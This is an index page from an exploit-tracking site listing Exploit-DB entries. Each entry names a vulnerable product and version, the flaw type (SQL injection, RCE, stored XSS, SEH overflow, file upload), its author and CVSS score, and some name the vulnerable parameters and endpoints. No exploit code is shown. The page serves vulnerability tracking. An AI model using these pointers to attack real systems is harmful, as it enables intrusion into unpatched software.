Exploitdb Exploits

50,076 exploits tracked across all sources.

Sort: Activity Stars
EIP-2026-113548 EXPLOITDB text
WordPress Plugin Ajax Load More 5.3.1 - '#1' Authenticated SQL Injection
by Nguyen Khang
EIP-2026-110111 EXPLOITDB text
Online Healthcare Patient Record Management System 1.0 - Authentication Bypass
by Daniel Monzón
EIP-2026-110110 EXPLOITDB text
Online Healthcare management system 1.0 - Authentication Bypass
by BKpatron
EIP-2026-110097 EXPLOITDB text
Online Examination System 1.0 - 'eid' SQL Injection
by BKpatron
EIP-2026-110067 EXPLOITDB text
online Chatting System 1.0 - 'id' SQL Injection
by BKpatron
CVE-2020-7209 EXPLOITDB CRITICAL text
HP LinuxKI < 6.0-2 - Remote Code Execution
LinuxKI v6.0-1 and earlier is vulnerable to an remote code execution which is resolved in release 6.0-2.
by Cody Winkler
CVSS 9.8
CVE-2019-3025 EXPLOITDB CRITICAL text
Oracle Food and Beverage Apps <5.7 - RCE
Vulnerability in the Oracle Hospitality RES 3700 component of Oracle Food and Beverage Applications. The supported version that is affected is 5.7. Difficult to exploit vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Hospitality RES 3700. While the vulnerability is in Oracle Hospitality RES 3700, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality RES 3700. CVSS 3.0 Base Score 9.0 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H).
by Walid Faour
CVSS 9.0
CVE-2020-13118 EXPLOITDB CRITICAL text
Mikrotik Router Monitoring System <2018-10-22 - SQL Injection
An issue was discovered in Mikrotik-Router-Monitoring-System through 2018-10-22. SQL Injection exists in check_community.php via the parameter community.
by jul10l1r4
CVSS 9.8
EIP-2026-113009 EXPLOITDB python
vBulletin 5.6.1 - 'nodeId' SQL Injection
by Photubias
CVE-2019-15083 EXPLOITDB MEDIUM text
ManageEngine ServiceDesk Plus < 10500 - Stored Cross-Site Scripting via Workstation Software Name
Default installations of Zoho ManageEngine ServiceDesk Plus 10.0 before 10500 are vulnerable to XSS injected by a workstation local administrator. Using the installed program names of the computer as a vector, the local administrator can execute code on the Manage Engine ServiceDesk administrator side. At "Asset Home > Server > <workstation> > software" the administrator of ManageEngine can control what software is installed on the workstation. This table shows all the installed program names in the Software column. In this field, a remote attacker can inject malicious code in order to execute it when the ManageEngine administrator visualizes this page.
by Felipe Molina
CVSS 6.1
EIP-2026-117019 EXPLOITDB python
Dameware Remote Support 12.1.1.273 - Buffer Overflow (SEH)
by gurbanli
EIP-2026-106624 EXPLOITDB text
E-Commerce System 1.0 - Unauthenticated Remote Code Execution
by SunCSR
EIP-2026-106104 EXPLOITDB python
Complaint Management System 1.0 - 'username' SQL Injection
by Daniel Ortiz
EIP-2026-101892 EXPLOITDB text
Netlink XPON 1GE WiFi V2801RGW - Remote Command Execution
by Seecko Das
CVE-2020-37074 EXPLOITDB CRITICAL python
Remote Desktop Audit 2.3.0.157 - RCE
Remote Desktop Audit 2.3.0.157 contains a buffer overflow vulnerability that allows attackers to execute arbitrary code during the Add Computers Wizard file import process. Attackers can craft a malicious payload file to trigger a structured exception handler (SEH) bypass and execute shellcode when importing computer lists.
by gurbanli
CVSS 9.8
CVE-2020-37014 EXPLOITDB MEDIUM text
Tryton < 5.4 - Stored Cross-Site Scripting via User Profile Name Input
Tryton 5.4 contains a persistent cross-site scripting vulnerability in the user profile name input that allows remote attackers to inject malicious scripts. Attackers can exploit the vulnerability by inserting script payloads in the name field, which execute in the frontend and backend user interfaces.
by Vulnerability-Lab
CVSS 6.4
CVE-2020-37003 EXPLOITDB MEDIUM text
Sellacious eCommerce < 4.6 - Stored Cross-Site Scripting in Manage Your Addresses Module
Sellacious eCommerce 4.6 contains a persistent cross-site scripting vulnerability in the Manage Your Addresses module that allows attackers to inject malicious scripts. Attackers can exploit multiple address input fields like full name, company, and address to execute persistent script code that can hijack user sessions and manipulate application modules.
by Vulnerability-Lab
CVSS 6.4
CVE-2020-37075 EXPLOITDB CRITICAL python
LanSend 3.2 - Remote Code Execution via Add Computers Wizard File Import
LanSend 3.2 contains a buffer overflow vulnerability in the Add Computers Wizard file import functionality that allows remote attackers to execute arbitrary code. Attackers can craft a malicious payload file to trigger a structured exception handler (SEH) overwrite and execute shellcode when importing computers from a file.
by gurbanli
CVSS 9.8
CVE-2020-37019 EXPLOITDB MEDIUM text
Orchard Core RC1 - Stored Cross-Site Scripting via Blog Post MarkdownBodyPart.Source Parameter
Orchard Core RC1 contains a persistent cross-site scripting vulnerability that allows remote attackers to inject malicious scripts through blog post creation. Attackers can create blog posts with embedded JavaScript in the MarkdownBodyPart.Source parameter to execute arbitrary scripts in victim browsers.
by SunCSR
CVSS 6.4
CVE-2020-11530 EXPLOITDB CRITICAL text
idangero chop_slider - Blind SQL Injection via id GET Parameter
A blind SQL injection vulnerability is present in Chop Slider 3, a WordPress plugin. The vulnerability is introduced in the id GET parameter supplied to get_script/index.php, and allows an attacker to execute arbitrary SQL queries in the context of the WP database user.
by SunCSR
CVSS 9.8
EIP-2026-111615 EXPLOITDB text
qdPM 9.1 - Arbitrary File Upload
by Besim
EIP-2026-106309 EXPLOITDB text
CuteNews 2.1.2 - Authenticated Arbitrary File Upload
by Nhat Ha
EIP-2026-103377 EXPLOITDB python
MacOS 320.whatis Script - Privilege Escalation
by Csaba Fitzl
CVE-2019-16112 EXPLOITDB HIGH python
TylerTech Eagle 2018.3.11 - Remote Code Execution via Untrusted Java Deserialization
TylerTech Eagle 2018.3.11 deserializes untrusted user input, resulting in remote code execution via a crafted Java object to the recorder/ServiceManager?service=tyler.empire.settings.SettingManager URI.
by Anthony Cole
CVSS 8.8
CVE-2019-15253 EXPLOITDB MEDIUM text
Cisco Catalyst Center < 1.3.0.6 - Authenticated Stored Cross-Site Scripting
A vulnerability in the web-based management interface of Cisco Digital Network Architecture (DNA) Center could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker needs administrator credentials. This vulnerability affects Cisco DNA Center Software releases earlier than 1.3.0.6 and 1.3.1.4.
by Dylan Garnaud
CVSS 4.8